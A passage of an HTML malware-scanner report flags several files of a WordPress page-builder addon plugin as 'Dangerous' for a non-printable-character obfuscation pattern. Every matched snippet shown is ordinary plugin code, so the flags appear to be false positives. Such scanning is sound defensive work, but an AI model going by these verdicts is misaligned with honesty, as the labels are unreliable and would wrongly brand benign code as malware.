</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_430").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_just_icon.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 20.75 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 11</span><br><table id="file_431" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_Just_Icon' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$aio_just_icon </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_Just_Icon</span><span style="color: #007700">(); } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && ! </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_Just_Icon' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_Just_Icon ex</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Just Icon Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Just Icon module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes settings of Just Icon Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 323</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Just Icon Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 328</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">just_icon_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">just_icon_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 517</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that checks </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">class </span><span style="color: #0000BB">is exists </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_431").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_tab.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 63.01 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 29</span><br><table id="file_432" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">containerHtmlBlockParams</span><span style="color: #007700">( </span><span style="color: #0000BB">$width</span><span style="color: #007700">, </span><span style="color: #0000BB">$i </span><span style="color: #007700">) { return </span><span style="color: #DD0000">'class="wpb_column_container vc_container_for_children"'</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">getColumnControls</span><span style="color: #007700">( </span><span style="color: #0000BB">$controls</span><span style="color: #007700">, </span><span style="color: #0000BB">$extended_css </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) { return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">getColumnControlsModular</span><span style="color: #007700">( </span><span style="color: #0000BB">$extended_css </span><span style="color: #007700">); } } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1255</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_tabs</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1331</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_tabs_admin</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1381</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1394</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">contentAdmin</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1474</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getTabTemplate</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1475</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'<div class="wpb_template">' </span><span style="color: #007700">. </span><span style="color: #0000BB">do_shortcode</span><span style="color: #007700">( </span><span style="color: #DD0000">'[single_tab title="Tab" tab_id="" icon_type="" icon="" icon_color="" icon_hover_color="" icon_size="15px" icon_background_color=""][/single_tab]' </span><span style="color: #007700">) . </span><span style="color: #DD0000">'</div>'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1482</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setCustomTabId</span><span style="color: #007700">( </span><span style="color: #0000BB">$content </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">( </span><span style="color: #DD0000">'/tab\_id\=\"([^\"]+)\"/'</span><span style="color: #007700">, </span><span style="color: #DD0000">'tab_id="$1-' </span><span style="color: #007700">. </span><span style="color: #0000BB">time</span><span style="color: #007700">() . </span><span style="color: #DD0000">'"'</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1495</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_path_dir' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1535</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings </span><span style="color: #007700">) { </span><span style="color: #FF8000">//phpcs:ignore Generic.CodeAnalysis.UselessOverridingMethod.Found</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1542</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">customAdminBlockParams</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1543</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">' id="tab-' </span><span style="color: #007700">. </span><span style="color: #0000BB">esc_attr</span><span style="color: #007700">( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">atts</span><span style="color: #007700">[</span><span style="color: #DD0000">'tab_id'</span><span style="color: #007700">] ) . </span><span style="color: #DD0000">'"'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1551</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mainHtmlBlockParams</span><span style="color: #007700">( </span><span style="color: #0000BB">$width</span><span style="color: #007700">, </span><span style="color: #0000BB">$i </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1552</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'data-element_type="' </span><span style="color: #007700">. </span><span style="color: #0000BB">esc_attr</span><span style="color: #007700">( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">settings</span><span style="color: #007700">[</span><span style="color: #DD0000">'base'</span><span style="color: #007700">] ) . </span><span style="color: #DD0000">'" class="wpb_' </span><span style="color: #007700">. </span><span style="color: #0000BB">esc_attr</span><span style="color: #007700">( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">settings</span><span style="color: #007700">[</span><span style="color: #DD0000">'base'</span><span style="color: #007700">] ) . </span><span style="color: #DD0000">' wpb_sortable wpb_content_holder"' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">customAdminBlockParams</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">containerHtmlBlockParams</span><span style="color: #007700">( </span><span style="color: #0000BB">$width</span><span style="color: #007700">, </span><span style="color: #0000BB">$i </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1561</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'class="wpb_column_container vc_container_for_children"'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1569</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getColumnControls</span><span style="color: #007700">( </span><span style="color: #0000BB">$controls</span><span style="color: #007700">, </span><span style="color: #0000BB">$extended_css </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1571</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">getColumnControlsModular</span><span style="color: #007700">( </span><span style="color: #0000BB">$extended_css </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 214</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_font_family' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 221</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_font_style' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 23</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 38</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_single_tab</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 636</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">ob_get_clean</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 642</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_tab_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 96</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_main_tab</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_432").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_modals.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 64.47 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 15</span><br><table id="file_433" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">ultimate_modal_init</span><span style="color: #007700">() { if ( </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">vc_map</span><span style="color: #007700">( array( </span><span style="color: #DD0000">'name' </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">( </span><span style="color: #DD0000">'Modal Box'</span><span style="color: #007700">, </span><span style="color: #DD0000">'ultimate_vc' </span><span style="color: #007700">), </span><span style="color: #DD0000">'base' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'ultimate_modal'</span><span style="color: #007700">, </span><span style="color: #DD0000">'icon' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'vc_modal_box'</span><span style="color: #007700">, </span><span style="color: #DD0000">'class' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'modal_box'</span><span style="color: #007700">, </span><span style="color: #DD0000">'category' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'Ultimate VC Addons'</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1365</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check </span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate_Info_Table</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 312</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Functions</span><span style="color: #007700">.</span><span style="color: #0000BB">RestrictedFunctions</span><span style="color: #007700">.</span><span style="color: #0000BB">wp_is_mobile_wp_is_mobile</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 31</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">Ultimate_Modals assets</span><span style="color: #007700">.</span>
</span>
